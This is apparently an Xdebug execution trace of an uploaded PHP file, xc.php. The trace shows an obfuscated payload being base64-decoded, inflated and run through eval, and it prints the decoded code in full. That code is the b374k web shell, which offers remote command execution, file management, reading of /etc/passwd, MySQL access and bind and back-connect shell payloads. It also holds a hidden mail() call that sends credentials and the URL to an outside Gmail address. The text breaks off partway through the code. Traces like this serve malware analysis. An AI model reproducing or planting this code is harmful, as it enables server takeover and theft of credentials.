Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:02:56.143564]
1	0	1	0.000129	393464
1	3	0	0.000266	410912	{main}	1		/var/www/html/uploads/xc.php	0	0
2	4	0	0.000283	410912	error_reporting	0		/var/www/html/uploads/xc.php	3	1	0
2	4	1	0.000329	410952
2	4	R			0
2	5	0	0.000343	410912	set_time_limit	0		/var/www/html/uploads/xc.php	4	1	0
2	5	1	0.000359	410976
2	5	R			FALSE
1		A						/var/www/html/uploads/xc.php	7	$code = '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2	6	0	0.000411	410944	base64_decode	0		/var/www/html/uploads/xc.php	194	1	'7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2	6	1	0.000481	427360
2	6	R			'=[붲{-l!\020\022\b[ \t\tpN?c;7lg=ha9=m-\001[\032hf$?z?{\'֞N늱ˆ\002 p$Wa\033p$pE8GiOm{\tQ\0244URT7!VHƖ?s\003Ar\034C%_-*bL\tC\006v )\004^\bF\f{\026((@\tK2գ/I\036~mL_"TʚM^:*\032L\\wE\022_\031\0016l+jb%\001c:\006\n\004n\001/֟C`\032\026i\003D8DOvI6TJk\n)\rtg&!HVHC\\\032%\026$~B\004Q)AJj\017G1k\022tYG\026j\022z"TLAMES7U\021\022!['
2	7	0	0.000716	427328	gzinflate	0		/var/www/html/uploads/xc.php	194	1	'=[붲{-l!\020\022\b[ \t\tpN?c;7lg=ha9=m-\001[\032hf$?z?{\'֞N늱ˆ\002 p$Wa\033p$pE8GiOm{\tQ\0244URT7!VHƖ?s\003Ar\034C%_-*bL\tC\006v )\004^\bF\f{\026((@\tK2գ/I\036~mL_"TʚM^:*\032L\\wE\022_\031\0016l+jb%\001c:\006\n\004n\001/֟C`\032\026i\003D8DOvI6TJk\n)\rtg&!HVHC\\\032%\026$~B\004Q)AJj\017G1k\022tYG\026j\022z"TLAMES7U\021\022!['
2	7	1	0.001060	468320
2	7	R			'\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length'
2	8	0	0.002246	692624	eval	1	'\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";"); echo $filez; exit; } if(isset($_GET[\'img\'])){ @ob_clean(); $d = magicboom($_GET[\'y\']); $f = $_GET[\'img\']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET[\'y\'])){ if(@is_dir($_GET[\'view\'])){ $pwd = $_GET[\'view\']; @chdir($pwd); } else{ $pwd = $_GET[\'y\']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \\$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." &gt;"; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\\\"); if ($bool) { $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER[\'REMOTE_ADDR\']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST[\'rename\'])){ $old = $_POST[\'oldname\']; $new = $_POST[\'newname\']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\\"gaya\\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\\"gaya\\">ON</span><br />"; else $buff .= "safemode <span class=\\"gaya\\">OFF<span><br />"; $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\\"?y=".$pwd."&amp;x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\"> <table class=\\"cmdbox\\" style=\\"width:50%;\\"> <tr><td>$prompt</td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form> <form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <tr><td>view file/folder</td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form></table><table class=\\"explore\\"> <tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr> ";@error_reporting(0);$sub="backdoor b374k";$headers  = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes     .= "username: ".$user."\\n";$mes     .= "password: ".$pass."\\n";$mes     .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes     .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";{mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);} if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?y=$pwd&amp;edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$parent."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?y=$pwd&amp;edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" /> </form> <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;fdelete=".$pwd.$folder."\\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&amp;view=$full\\">$file</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" /> </form> </td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\\"?y=$pwd&amp;edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$full\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$full\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$full\\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break; case \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break; case \'wfread\' : ambil($wurl,$namafile);break; case \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break; case \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break; case \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break; case \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=\'\'; $perms .= ($mode & 00400) ? \'r\' : \'-\'; $perms .= ($mode & 00200) ? \'w\' : \'-\'; $perms .= ($mode & 00100) ? \'x\' : \'-\'; $perms .= ($mode & 00040) ? \'r\' : \'-\'; $perms .= ($mode & 00020) ? \'w\' : \'-\'; $perms .= ($mode & 00010) ? \'x\' : \'-\'; $perms .= ($mode & 00004) ? \'r\' : \'-\'; $perms .= ($mode & 00002) ? \'w\' : \'-\'; $perms .= ($mode & 00001) ? \'x\' : \'-\'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(\'cmd\').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST[\'submitcmd\'])) { echo eval(magicboom($_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd\');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mysql\')){ if(isset($_GET[\'sqlhost\']) && isset($_GET[\'sqluser\']) && isset($_GET[\'sqlpass\']) && isset($_GET[\'sqlport\'])){ $sqlhost = $_GET[\'sqlhost\']; $sqluser = $_GET[\'sqluser\']; $sqlpass = $_GET[\'sqlpass\']; $sqlport = $_GET[\'sqlport\']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\\"width:99%;padding:4px 10px 0 10px;\\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\\"gaya\\">@</span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\\"gaya\\">-&gt;</span>&nbsp;&nbsp;<a href=\\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\\">[ databases ]</a>"; if(isset($_GET[\'db\'])) $msg .= "&nbsp;&nbsp;<span class=\\"gaya\\">-&gt;</span>&nbsp;&nbsp;<a href=\\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET[\'db\']."\\">".htmlspecialchars($_GET[\'db\'])."</a>"; if(isset($_GET[\'table\'])) $msg .= "&nbsp;&nbsp;<span class=\\"gaya\\">-&gt;</span>&nbsp;&nbsp;<a href=\\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET[\'db\']."&amp;table=".$_GET[\'table\']."\\">".htmlspecialchars($_GET[\'table\'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET[\'db\']) && (!isset($_GET[\'table\'])) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $query = "DROP TABLE IF EXISTS b374k_table;\\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\\nLOAD DATA INFILE \\"/etc/passwd\\"\\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">$query</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET[\'table\']) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $table = $_GET[\'table\']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input 